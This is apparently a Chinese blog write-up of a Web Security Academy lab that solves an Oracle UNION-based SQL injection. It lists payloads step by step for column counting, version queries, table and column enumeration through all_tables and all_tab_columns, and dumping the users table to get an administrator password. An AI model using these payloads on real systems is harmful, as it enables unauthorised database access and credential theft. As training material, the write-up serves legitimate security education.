Web Security Academy 第六关: Oracle 数据库 SQL 注入实战详解

发布时间:2026/9/22 2:01:02

Web Security Academy 第六关: Oracle 数据库 SQL 注入实战详解 前言SQL 联合查询注入是渗透测试中最常见的注入手段之一但不同数据库的语法、系统视图存在明显区别不能一套 Payload 通吃所有环境。上一篇文章我们完成了 PostgreSQL 靶场的注入实操本篇带来同系列 Oracle 数据库专项靶场场景同样是商品筛选页面 category 参数字符型注入。本文会完整复现从漏洞探测、列数判断、系统视图枚举到脱库拿管理员密码的全流程同时重点对比 Oracle 与 MySQL、PostgreSQL 的注入语法差异帮大家区分记忆不同数据库注入核心要点。一、探测注入点确认字符型注入漏洞1. 原始靶场页面正常访问分类页面/filter?categoryPets页面展示宠物商品存在可控 GET 参数 category。2. 单引号闭合测试触发 500 报错PayloadPetsURL 编码访问/filter?categoryPets%27页面返回Internal Server Error证明输入直接拼接 SQL无过滤存在注入漏洞。二、Order By 二分法判断页面回显字段数Union 查询要求前后字段数量一致使用order by探测列数测试 order by 3Payload order by 3--访问页面抛出 500 错误说明查询只有 2 列不存在第 3 列。测试 order by 2Payload order by 2--页面正常加载无报错确定页面 SQL 查询结果为 2 列后续 Union 必须填写 2 个字段。三、Oracle 专属 Union 查询基础探测Oracle 数据库和 MySQL 最大区别SELECT 语句必须带 FROM 子句无表查询需要使用虚表dual。1. dual 虚表占位测试验证两列回显Payload-1 union SELECT 1,2 FROM dual---1 让原分类查询无数据页面单独展示 Union 结果成功输出 1、2两列均可回显数据。2. 查询 Oracle 数据库版本Oracle 系统视图v$version存放数据库版本信息。Payload-1 union SELECT banner,2 FROM v$version--页面返回完整 Oracle 11g 版本信息确认后端数据库类型。四、枚举全库数据表Oracle 系统表 all_tables非 Oracle 使用information_schema.tablesOracle 使用all_tables存储所有表名。Payload-1 union SELECT table_name,2 FROM all_tables--页面批量输出库内全部数据表滚动页面找到业务用户表USERS_LYHIFM该表存储账号密码。五、枚举用户表字段Oracle 系统表 all_tab_columnsOracle 通过all_tab_columns查询字段限定表名筛选用户表字段。Payload UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_nameUSERS_LYHIFM--页面回显 3 个核心字段USERNAME_XSSQAE、PASSWORD_ZOFYAU、EMAIL对应账号、密码、邮箱。六、脱库获取管理员账号密码直接查询用户表用户名、密码字段。Payload UNION SELECT USERNAME_XSSQAE, PASSWORD_ZOFYAU FROM USERS_LYHIFM--页面输出全站所有账号凭证提取管理员信息用户名administrator密码27q6tcw3jlq4qgb6xwcb七、登录管理员账号完成靶场通关跳转网站登录页面填入获取到的管理员用户名与密码。登录成功进入个人中心页面弹出Congratulations, you solved the lab!靶场完成。实验总结Oracle vs MySQL/PostgreSQL 注入核心差异1. 基础语法区别Oracle SELECT 必须带 FROM无表查询使用虚表dualMySQL/PostgreSQL 可直接select 1,2无需 FROM。注释符通用--Oracle 不支持#单行注释。字符串大小写敏感表名、字段名匹配时大小写必须完全一致。2. 系统库枚举视图对比功能MySQL/PostgreSQLOracle枚举所有表information_schema.tablesall_tables枚举字段information_schema.columnsall_tab_columns查询数据库版本version()v$version3. 通用注入流程Oracle 专用单引号测试判断字符型注入order by 探测回显字段数量union select dual 虚表测试回显位查询 v$version 识别数据库枚举 all_tables 寻找用户表枚举 all_tab_columns 获取字段名查询用户表脱取管理员账号密码
延伸阅读

更多相关文章

2026/9/19 23:24:23

专业的GEO优化平台

随着豆包、文心一言、Kimi等生成式AI的爆发式增长,用户的搜索习惯正从“关键词输入”全面转向“对话式提问”。在这一背景下,传统SEO的流量入口地位正在被削弱,GEO(生成式引擎优化)已成为企业在AI时代获得品牌曝光与客…

2026/9/19 23:24:23

合肥代账公司代理记账实务:企业账务规范与税务合规管理

在国家税务总局合肥市税务局持续推进数字化征管的背景下,合肥中小企业面临的不仅是按时申报的基本要求,更是账目清晰、凭证完整的合规考验。一家规范运营的合肥代账公司,能够帮助创业者将精力聚焦于业务本身,而非被繁琐的财税事务…

2026/9/22 2:00:00

搞懂健身教练要求这3点,前端实战项目不再踩坑

搞懂健身教练要求这3点,前端实战项目不再踩坑 刚入行前端,或者从其他行业转行过来,是不是经常陷入这种尴尬:语法背得滚瓜烂熟,LeetCode 刷了大半本,但一让你做一个 实战项目 ,脑子就一片空白?…

2026/9/22 2:00:00

瓜帅考试避坑指南:5个面试必问底层原理

瓜帅考试避坑指南:5个面试必问底层原理 看了一堆瓜帅教程还是不会写项目?别急,这锅不全是你的。很多技术老手在复盘时发现,卡住你的往往不是语法,而是那些 面试必问…

2026/9/22 2:00:00

网易云下载源码深扒:3个坑让你不再配置半天,面试必问

网易云下载源码深扒:3个坑让你不再配置半天,面试必问 配置环境就卡半天,依赖装不上、协议解析错、登录态失效,这几乎是所有尝试逆向网易云下载的人共同的噩梦。别急,今天咱们不聊虚的,直接拆开 NeteaseCloudMusicApi…

2026/9/22 2:00:00

3分钟搞定登入成语:源码解析+移动端实战避坑指南

3分钟搞定登入成语:源码解析+移动端实战避坑指南 看着满屏红色的 StackTrace ,是不是脑子嗡嗡作响?别慌,这通常是新手在 登入成语 相关开发中遇到的典型场景,尤其是当业务逻辑与底层源码交互出错时。…

2026/9/22 1:55:00

机峰网入门到精通:3招搞定复制代码跑不通的底层逻辑

机峰网入门到精通:3招搞定复制代码跑不通的底层逻辑 刚拿到机峰网项目的源码,或者从网上扒下来的配置片段,一跑就报错?那种“明明看着对,为什么就是通不了”的无力感,是每个刚从学校出来、想通过 机峰网…

2026/9/21 3:28:31

GAMP 5 基于风险的计算机化系统验证:软件分类与审计追踪实践

简介:《A Risk-Based Approach to Compliant GxP Computerized Systems》即业内熟知的GAMP 5指南,面向制药企业质量与IT合规人员、验证工程师及计算机化系统管理者,用于解决GxP法规环境下系统合规性难以科学落地的问题。文档以风险管理为主线…

2026/9/21 3:33:19

安全托管MSSP实战:从静态防御到人机协同的攻防运营与应急响应

简介:这份PPT围绕互联网业务安全托管服务展开,面向企业安全负责人、IT运维人员及关注MSSP/MSS选型的读者,重点回应传统安全过度依赖人工、碎片化静态防御难以对抗产业化攻击等痛点。资源共1个pptx文件,包体约30.63MB,以…

2026/9/22 0:04:49

输电线路在线监测高频面试题拆解 3秒抓住官方文档重点

输电线路在线监测高频面试题拆解 3秒抓住官方文档重点 官方文档几百页翻到头还是懵?面试问到 输电线路在线监测 的数据链路时,脑子一片空白?别慌,这种 高频面试题 我整理了10年,专门治各种“文档太长抓不住重点”的毛病。…

2026/9/22 0:04:49

中介房源管理系统重构避坑:3个关键步骤搞定API变更

中介房源管理系统重构避坑:3个关键步骤搞定API变更 版本升级后 API 全变了,这种痛只有真做过的人懂。 很多团队在接手老旧房产项目时,最崩溃的不是代码烂,而是底层框架升级后,原本熟悉的接口调用方式彻底失效。 这份 保姆级教程…

2026/9/22 0:04:49

3个坑点带你一文搞懂55gg小游戏源码

3个坑点带你一文搞懂55gg小游戏源码 盯着控制台满屏的红色报错,看着那一长串 StackTrace ,是不是脑子瞬间宕机?别急,这种时候最忌讳的就是盲目改代码。很多刚入行的前端同学,面对 55gg 小游戏这类轻量级 H5…

2026/9/20 4:54:47

USB Type-C PCB布局分区设计:电源、高速信号与PD协议全攻略

做硬件这行,Type-C接口算是典型的“看着简单,做起来全坑”的东西。光引脚就24个,高低速信号、电源、控制线全部塞在一个小小的连接器里,如果PCB布局不做规划,打样回来基本就是“插上没反应”、“高速掉线”、“静电一打…

2026/9/21 18:32:12

系统编程学习原型如何补齐稳定性边界

系统编程学习原型如何补齐稳定性边界预算有限时&#xff0c;我先优化明显多余的复制&#xff0c;而不是猜测性地换容器。用借用传递只读数据通常就能减少分配&#xff1a; fn parse(line: &str) -> Result<Item, Error> { /* ... */ }用基准确认热点确实在分配&am…

2026/9/21 10:29:02

雨花区哪家财务公司代理记账比较好?

在雨花区&#xff0c;企业处理财税事务常常面临诸多挑战&#xff0c;选择一家靠谱的财务公司至关重要。湖南巨勤财务管理咨询有限公司就是本地正规实体财税服务机构&#xff0c;深耕本地工商财税行业多年&#xff0c;熟悉当地工商局、税务局最新政策与申报流程。主营公司注册、…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
咨询二维码